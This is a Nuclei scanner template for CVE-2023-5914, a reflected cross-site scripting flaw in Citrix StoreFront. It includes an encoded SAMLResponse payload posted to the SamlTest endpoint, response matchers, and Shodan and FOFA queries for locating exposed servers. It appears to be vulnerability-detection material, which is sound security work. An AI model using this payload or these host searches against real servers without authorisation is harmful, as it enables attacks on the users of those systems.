id: CVE-2023-5914 info: name: Citrix StoreFront - Cross-Site Scripting author: DhiyaneshDK severity: medium description: | Reflected Cross-Site Scripting issue which is exploitable without authentication. This vulnerability was exploitable through coercing an error message during an XML parsing procedure in the SSO flow. reference: - https://www.assetnote.io/resources/research/continuing-the-citrix-saga-cve-2023-5914-cve-2023-6184 - https://support.citrix.com/article/CTX583759/citrix-storefront-security-bulletin-for-cve20235914 - https://www.youtube.com/watch?v=t8MeUQrPqec - https://nvd.nist.gov/vuln/detail/CVE-2023-5914 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-5914 cwe-id: CWE-79 epss-score: 0.00095 epss-percentile: 0.39942 cpe: cpe:2.3:a:cloud:citrix_storefront:*:*:*:*:ltsr:*:*:* metadata: max-request: 1 vendor: cloud product: citrix_storefront shodan-query: - html:"/Citrix/StoreWeb" - http.html:"/citrix/storeweb" fofa-query: body="/citrix/storeweb" tags: cve,xss,citrix,storefront,cve2023,cloud http: - method: POST path: - "{{BaseURL}}/Citrix/teststoreAuth/SamlTest" headers: Content-Type: application/x-www-form-urlencoded body: "SAMLResponse=q1YKdvT1CUotLsjPK05VskLhBrhHlSVVOpkkhZebJRs7ZUQahVp6ZkYVp7iUVEUaexUkewTmRhkHmkeGV%2bQk5wXm%2bwZn5yZ5BJr7GPtlJefmlKc4R%2bWluBRnBmSVl0XlWpYFpNvaKtUCAA%3d%3d" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains_all(body, "", "XmlException")' condition: and # digest: 4a0a00473045022100ccec8044121731cec8adc8d22c54e462ada30eef8c491cdecc278c315e01502c02207c5d9be110a2f11e8fffcd7f6d539a48b32431bc9f28f5e62628be555f8db784:922c64590222798bb761d5b6d8e72950